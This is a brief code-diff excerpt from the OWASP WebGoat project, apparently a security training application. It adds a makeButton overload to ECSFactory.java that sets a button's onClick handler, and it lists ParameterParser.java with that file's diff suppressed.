webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
View File

@ -116,6 +116,15 @@ public class ECSFactory
return (b); return (b);
} }
public static Element makeButton(String text, String onClickFunction)
{
Input b = (Input)makeButton(text);
b.setOnClick(onClickFunction);
return (b);
}
/** /**
* Description of the Method * Description of the Method

1885
webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
View File

File diff suppressed because it is too large Load Diff